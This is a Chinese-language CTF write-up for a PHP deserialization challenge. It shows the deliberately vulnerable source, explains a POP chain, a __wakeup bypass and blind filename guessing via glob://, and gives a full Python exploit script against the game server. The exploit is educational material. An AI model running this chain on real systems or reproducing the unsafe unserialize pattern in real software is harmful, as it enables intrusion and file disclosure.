题目源码:
<?php
error_reporting(0);
show_source(__FILE__);
class Hoshino
{
public $Ruby;
private $Aquamarine;
public function __destruct()
{
$this->Ruby->func();
}
}
class Idol
{
public $Akane;
public function __wakeup()
{
$this->Akane = '/var/www/html/The************************.php';
}
public function __call($method,$args)
{
$Kana = count(scandir($this->Akane));
if ($Kana > 0) {
die('Kurokawa Akane');
} else {
die('Arima Kana');
}
}
}
$a = unserialize(base64_decode($_GET['tuizi']));
?>
POP链很简单:Hoshino::__destruct(调用Idol类中不存在的方法)=>Idol::__call
思路就是可以通过glob://协议利用匹配符号进行猜解, glob协议能够查找匹配的文件路径模式,当目标匹配不存在时会返回⻓度为0的数组,因此在这个地方能够通过不同的回显进行盲注,利用脚本和通配符逐个猜解,若正常页面会显示“Kurokawa Akane”,接着爆下一个,直到找到正确文件名
其中通过修改属性绕过 __wakeup
import requests,base64
url = 'http://hcek0fp8wd5f5tudntpuhce7n.node.game.sycsec.com/'
flag = ''
for _ in range(1,40):
for i in range(32,128):
if i in [37,42,62,63]:
continue
ser = r'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'+str(29+_)+':"glob:///var/www/html/The'+flag+chr(i)+'*.php";}s:19:"HoshinoAquamarine";N;}'
ser=ser.encode('utf-8')
param=base64.b64encode(ser)
param=r'?tuizi='+param.decode()
#print(url+param)
res = requests.get(url+param)
#print(res.text)
if 'code>Kurokawa' in res.text:
flag += chr(i)
print(flag)
break
flag_url=url+'The'+flag.replace(" ","")+'.php'
print(flag_url)
print(requests.get(flag_url).text)
参考文章:
https://blog.csdn.net/m0_46436640/article/details/119413552
https://www.jianshu.com/p/16c56bebc63d